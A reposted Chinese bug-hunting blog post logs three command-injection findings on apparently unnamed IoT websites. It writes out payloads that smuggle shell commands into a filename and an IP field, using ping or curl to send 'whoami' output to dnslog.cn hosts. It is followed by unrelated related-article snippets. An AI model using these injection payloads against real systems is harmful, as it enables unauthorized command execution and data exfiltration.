那年那日那些洞

news/2024/10/18 10:28:47/

前言

此文库主要是记录一年来一些有趣的漏洞,拿出来给大家分享一下,仅供学习参考,禁止对任何未授权的网站进行实操。

此系列会持续更新~~~也欢迎大家投稿!!

1.命令执行

不说废话直接上图,这是一个iot的站所以有些功能点就很奇怪的。

图片

图片

图片

修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn

图片

图片

神奇吧,为什么我会想到在filename拼接语句呢

因为平时在上传点的filename也是有概率存在rce的,所以我就试了试

图片

图片

凑字数凑字数凑字数凑字数凑字数凑字数凑凑字数凑字数字数2.命令执行

还是iot的站图片

图片

看到ping的字眼就要注意了,这个包很明显就是在ping 192.168.5.1

这个包,把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样

图片

图片

3.(惊掉你眼睛的)命令执行

同样还是iot的站,跟上面是同一个站点

图片

这是试听的原始包。

图片

但是他的返回包是这样的

图片

于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn

图片

图片

神奇吧!!!!!!!!!!


http://www.ppmy.cn/news/798568.html

相关文章

【社会实践】红旗渠:青年洞

“闪闪红星“社会实践团队活动简报——2019年11月10日 第二天,河南工业大学闪闪红星社会实践团队来到了红旗渠总干渠主要工程之一的青年洞。下车后,首先映入眼帘的就是青年洞主入口标志性建筑红飘带——廊桥。廊桥的整体形态犹如山间舞动的红飘带&#x…

Unity Shader 简单地挖一个洞

11月就要过去了,2020年已经走到尾声。从月中开始就苦苦思考有什么值得写的东西,结果发现这个月没有写什么太值得深纠的东西,就一直拖到了现在。 效果描述 其大致效果是在地上挖一个洞,然后有东西从洞里面升起来,具体…

文件洞的处理

存储引擎经常要面对的一个问题,就是洞的处理。一些思路: 1)如果可以,重用现有空间,而不是增加文件大小,比如在hash store中,新value比旧value的长度小, 2)使用Segment …

有五个山洞,一字排开,一只狐狸住在某个洞,每天晚上会换住到相邻的洞中,一个猎人只能每天早上去一个洞

这是一个经典的智力题,在网上找也找到了很多不相关的答案,但是这个问题早就有经典解法了,234432最多六天,下面来分析一下: 第一次抓第二个,不在二中,则在一三四五中,晚上只能跑到二…

【垃圾洞思路拓展】Druid-monitor

【垃圾洞思路拓展】Druid-monitor 垃圾洞思路拓展 Druid-monitor 对web安全学习了一段时间,对src进行一次初探,但学业繁忙(也是比较菜),佛系挖洞。对那些年捡过的垃圾洞可以变高危洞进行一个思路拓展。 0x10 Druid-…

blander 在物体上开一个洞

开启 Bool Tool 插件 在需要开洞的地方 添加 圆柱 设置好大小 选中圆柱。然后选中方块 booltool面板 按下diff键

关于挖洞

为什么别人的洞能那么多 都是一样的burp 1 信息收集真的很重要 听了很多大佬的话 反正就是 别人能找到你找不到的业务 就拿盒子的来说 一个朋友就找了自己没有找到的站 挖到了一个任意用户注册,。,。。。 所以 多和别人学习业务收集 2  基…